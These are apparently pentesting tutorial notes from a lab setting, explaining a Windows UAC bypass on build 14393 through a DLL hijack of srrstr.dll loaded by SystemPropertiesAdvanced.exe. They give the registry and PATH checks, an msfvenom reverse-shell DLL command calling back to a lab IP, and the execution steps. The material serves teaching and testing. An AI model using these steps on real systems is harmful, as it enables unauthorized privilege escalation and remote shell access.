Bypassing UAC

Read more about UAC on the dedicated section in Windows Security.

There is no command-line version of the UAC GUI consent prompt, so if we need to bypass the UAC in a CLI environment we will have to proceed as follow:

0 - Situation

We have shell access to a windows target but are restricted by UAC which we must bypass.

1 - Check UAC status & level

Confirm UAC is enabled:

C:\hacker> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1

0x1 for enabled and 0x0 for disabled.

Check UAC level:

C:\htb> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

From level 1 (0x1) to level 5 (0x5)

2- Check Windows Build

UAC bypasses leverage flaws or unintended functionality in different Windows builds.

PS C:\hacker> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Build version 14393, which on this page corresponds to Windows release 1607.

3 - Find exploit on UACME

The UACME project maintains a list of UAC bypasses. We can find older ones (fixed by Windows) here => https://github.com/hfiref0x/UACME/tree/v3.2.x

We will use method 54 for this example:

54. Author: egre55

    Type: Dll Hijack
    Method: Dll path search abuse
    Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe
    Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll
    Implementation: ucmEgre55Method
    Works from: Windows 10 (14393)
    Fixed in: Windows 10 19H1 (18362)
        How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call

This technique targets the 32-bit version of the auto-elevating binary SystemPropertiesAdvanced.exe. There are many trusted binaries that Windows will allow to auto-elevate without the need for a UAC consent prompt.

According to this blog post, the 32-bit version of SystemPropertiesAdvanced.exe attempts to load the non-existent DLL srrstr.dll, which is used by System Restore functionality.

4 - Review the PATH

As mentionned in the blog post, SystemPropertiesAdvanced.exe will attempt to load a non-existing DLL called srrstr.dll from C:\Users\<USER>\AppData\Local\Microsoft\WindowsApps\

Non-privilege users can write to this directory because it's used to install Microsoft apps.

If this dir is in our path (which it should) we can hijack the DLL (check section on DLIB if needed)

PS C:\hacker> cmd /c echo %PATH%

C:\Windows\system32;
C:\Windows;
C:\Windows\System32\Wbem;
C:\Windows\System32\WindowsPowerShell\v1.0\;
C:\Users\hacker\AppData\Local\Microsoft\WindowsApps;

5 - Generating malicious DLL

Using msfvenom we will spawn a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f dll > srrstr.dll

And transfer it to the target.

6 - Verify the DLL

If we execute the DLL itself, we should catch a shell, still restricted by UAC.

rundll32 shell32.dll,Control_RunDLL C:\Users\hacker\AppData\Local\Microsoft\WindowsApps\srrstr.dll

7 - Getting unrestricted shell

We can now execute SystemPropertiesAdvanced.exe which will load the dll which should send us an unrestricted shell this time (sinc SystemPropertiesAdvanced.exe can auto-elevate):

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

We should catch a shell, of course still under Sarah but without UAC which we can confirm:

whoami /priv

We have significantly more privileges than with a restricted shell.